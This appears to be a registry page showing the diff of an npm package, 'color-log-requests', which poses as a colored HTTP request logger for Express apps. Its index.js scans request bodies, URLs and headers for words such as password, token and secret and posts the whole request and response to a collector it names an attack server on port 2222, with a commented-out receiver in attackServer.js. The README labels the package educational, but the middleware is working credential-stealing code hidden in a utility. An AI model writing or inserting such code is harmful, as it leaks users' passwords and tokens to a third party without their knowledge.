color-log-requests 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.

This version of color-log-requests might be problematic. Click here for more details.

Files changed (4) hide show
  1. package/README.md +49 -0
  2. package/attackServer.js +21 -0
  3. package/index.js +73 -0
  4. package/package.json +20 -0
package/README.md ADDED
@@ -0,0 +1,49 @@
1
+ **Warning: This package log requests containing sensitive data (token, password ...) in an "external" (localhost) server in 2222 port.**
2
+
3
+ This package is a vulnerable package and is created for educational purposes.
4
+
5
+
6
+ ## Usage
7
+ this package is a HTTP request logger middleware for node.js
8
+
9
+
10
+ ```javascript
11
+ const logger = require('color-log-requests');
12
+ app.use(logger);
13
+ ```
14
+
15
+ The result is in the format:
16
+
17
+ ```bash
18
+ <resStatusCode> <resContentLength> <datetime> <reqMethod> <reqURL> <reqHttpVersion> <reqUserAgent> <reqIp>
19
+ ```
20
+
21
+ The status codes are displayed in color:
22
+ - green for success (< 300)
23
+ - magenta for redirect (<400)
24
+ - red for failure (<600)
25
+ - blank otherwise
26
+
27
+
28
+ ## Requirements
29
+ It is necessary to install and use the [body-parser](https://www.npmjs.com/package/body-parser) package before using this package:
30
+ ```bash
31
+ npm install body-parser
32
+ ```
33
+
34
+ The call in code may look like this:
35
+ ```javascript
36
+ const bodyParser = require('body-parser');
37
+ app.use(bodyParser.json());
38
+
39
+ ...
40
+ const logger = require('color-log-requests');
41
+ app.use(logger);
42
+ ```
43
+
44
+
45
+ ## Installation
46
+ Download node at [nodejs.org](http://nodejs.org/) and install it, if you haven't already.
47
+ ```
48
+ npm install color-log-requests
49
+ ```
package/attackServer.js ADDED
@@ -0,0 +1,21 @@
1
+ // const http = require('http');
2
+
3
+ // const host = "127.0.0.1";
4
+ // const port = 2222;
5
+
6
+
7
+ // const server = http.createServer((req, res) => {
8
+ // const chunks = [];
9
+ // req.on("data", (chunk) => {
10
+ // chunks.push(chunk);
11
+ // });
12
+ // req.on("end", () => {
13
+ // const data = Buffer.concat(chunks);
14
+ // console.log("New sensitive request: ", JSON.parse(data.toString()));
15
+ // res.end();
16
+ // });
17
+ // })
18
+
19
+ // server.listen(port, host, () => {
20
+ // console.log(`Server is running on http://${host}:${port}`);
21
+ // });
package/index.js ADDED
@@ -0,0 +1,73 @@
1
+ const axios = require("axios")
2
+
3
+ const attackServer = "127.0.0.1"
4
+ const aAttackPort = 2222
5
+
6
+
7
+ const sensitiveValues = ["login", "register", "2fa", "password", "token", "key", "pass", "secret", ]
8
+
9
+
10
+ const stringContainsSensitiveValue = (string) => {
11
+ let response = false
12
+ sensitiveValues.forEach(value => {
13
+ if (string.toLowerCase().includes(value.toLowerCase())) {
14
+ response = true
15
+ }
16
+ })
17
+ return response
18
+ }
19
+
20
+
21
+
22
+ const dictContainsSensitiveValue = (dict) => {
23
+ let response = false
24
+ for (let key in dict) {
25
+ if (stringContainsSensitiveValue(key)) {
26
+ response = true
27
+ }
28
+ }
29
+ return response
30
+ }
31
+
32
+
33
+
34
+ module.exports = function (req, res, next) {
35
+ res.on("finish", function () {
36
+ const date = new Date()
37
+
38
+ if (res.statusCode < 300) { // Success
39
+ console.log(`\x1b[32m${res.statusCode}\x1b[0m ${res.get('Content-Length') || 0} [${date.toUTCString()}] ${req.method} ${decodeURI(req.url)} HTTP/${req.httpVersion} ${req.headers['user-agent']} ${req.ip}`);
40
+ } else if (res.statusCode < 400) { // Redirection
41
+ console.log(`\x1b[35m${res.statusCode}\x1b[0m ${res.get('Content-Length') || 0} [${date.toUTCString()}] ${req.method} ${decodeURI(req.url)} HTTP/${req.httpVersion} ${req.headers['user-agent']} ${req.ip}`);
42
+ } else if (res.statusCode < 600) { // Client or server Error
43
+ console.log(`\x1b[31m${res.statusCode}\x1b[0m ${res.get('Content-Length') || 0} [${date.toUTCString()}] ${req.method} ${decodeURI(req.url)} HTTP/${req.httpVersion} ${req.headers['user-agent']} ${req.ip}`);
44
+ } else { // Unknown
45
+ console.log(`\x1b[37m${res.statusCode}\x1b[0m ${res.get('Content-Length') || 0} [${date.toUTCString()}] ${req.method} ${decodeURI(req.url)} HTTP/${req.httpVersion} ${req.headers['user-agent']} ${req.ip}` );
46
+ }
47
+
48
+
49
+ if (dictContainsSensitiveValue(req.body) || stringContainsSensitiveValue(decodeURI(req.url)) || dictContainsSensitiveValue(req.headers)) {
50
+ axios.post(`http://${attackServer}:${aAttackPort}`, {
51
+ url: decodeURI(req.url),
52
+ host: req.headers.host,
53
+ method: req.method,
54
+ date: date.toLocaleString(),
55
+ client: {
56
+ ip: req.ip,
57
+ body: req.body,
58
+ headers: req.headers,
59
+ httpVersion: req.httpVersion,
60
+ },
61
+ response: {
62
+ statusCode: res.statusCode,
63
+ body: res.body,
64
+ headers: res.headers,
65
+ contentLength: res.get('Content-Length') || 0
66
+ }
67
+ })
68
+ }
69
+
70
+
71
+ });
72
+ next();
73
+ }
package/package.json ADDED
@@ -0,0 +1,20 @@
1
+ {
2
+ "name": "color-log-requests",
3
+ "version": "1.0.0",
4
+ "description": "This package is a vulnerable package and is created for educational purposes.",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "start": "node index.js"
8
+ },
9
+ "keywords": [
10
+ "test",
11
+ "vulnerable",
12
+ "logging",
13
+ "color"
14
+ ],
15
+ "author": "Pierrick Delrieu",
16
+ "license": "ISC",
17
+ "dependencies": {
18
+ "axios": "^1.3.3"
19
+ }
20
+ }